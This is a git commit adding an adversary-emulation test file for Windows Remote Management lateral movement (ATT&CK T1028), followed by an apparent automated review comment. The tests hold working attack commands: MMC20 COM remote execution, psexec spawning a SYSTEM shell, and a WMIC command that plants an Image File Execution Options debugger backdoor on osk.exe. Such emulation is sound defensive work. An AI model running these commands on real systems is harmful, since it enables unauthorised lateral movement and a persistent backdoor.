1028 inbound hot! 🔥
Michael Haag
2018-05-25 10:00:18 -04:00
parent 24c91deef0
commit ff46dfdcbb
+90
@@ -0,0 +1,90 @@
---
attack_technique: T1028
display_name: Windows Remote Management
atomic_tests:
- name: Enable Windows Remote Management
description: |
Powershell Enable WinRM
supported_platforms:
- windows
executor:
name: powershell
command: |
powershell Enable-PSRemoting -Force
- name: PowerShell Lateral Movement
description: |
Powershell lateral movement using the mmc20 application com object
Reference:
https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/
supported_platforms:
- windows
input_arguments:
computername:
description: Name of Computer
type: string
default: computer1
executor:
name: command_prompt
command: |
powershell.exe [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","${computername}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
- name: WMIC Process Call Create
description: |
Utilize WMIC to start remote process
supported_platforms:
- windows
input_arguments:
user_name:
description: Username
type: String
default: DOMAIN\Administrator
password:
description: Password
type: String
default: P@ssw0rd1
computer_name:
description: Target Computer Name
type: String
default: Target
executor:
name: command_prompt
command: |
wmic /user:${user_name} /password:${password} /node:${computer_name} process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
- name: Psexec
description: |
Utilize psexec to start remote process
supported_platforms:
- windows
input_arguments:
user_name:
description: Username
type: String
default: DOMAIN\Administrator
password:
description: Password
type: String
default: P@ssw0rd1
computer_name:
description: Target Computer Name
type: String
default: Target
executor:
name: command_prompt
command: |
psexec \\host -u domain\user -p password -s cmd.exe
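Review bot: the MMC20 command on the `powershell.exe [activator]::CreateInstance(...)` line references `.Documnet.ActiveView`, a misspelling of the COM object's `Document` property, so the test will throw at runtime; change it to `.Document.ActiveView.ExecuteShellCommand(...)`. The `psexec \\host -u domain\user -p password -s cmd.exe` command ignores the declared `user_name`, `password` and `computer_name` input arguments; substitute `${computer_name}`, `${user_name}` and `${password}` so the inputs are actually used, as the WMIC test does. The WMIC test's description says it starts a remote process, but the command writes an Image File Execution Options `Debugger` value for `osk.exe` that persists after the test runs; the description should state that, and a cleanup step deleting that key should be added so the test does not leave the target modified. Minor: `type` is written as `string` in the MMC20 test and `String` in the other two; pick one spelling.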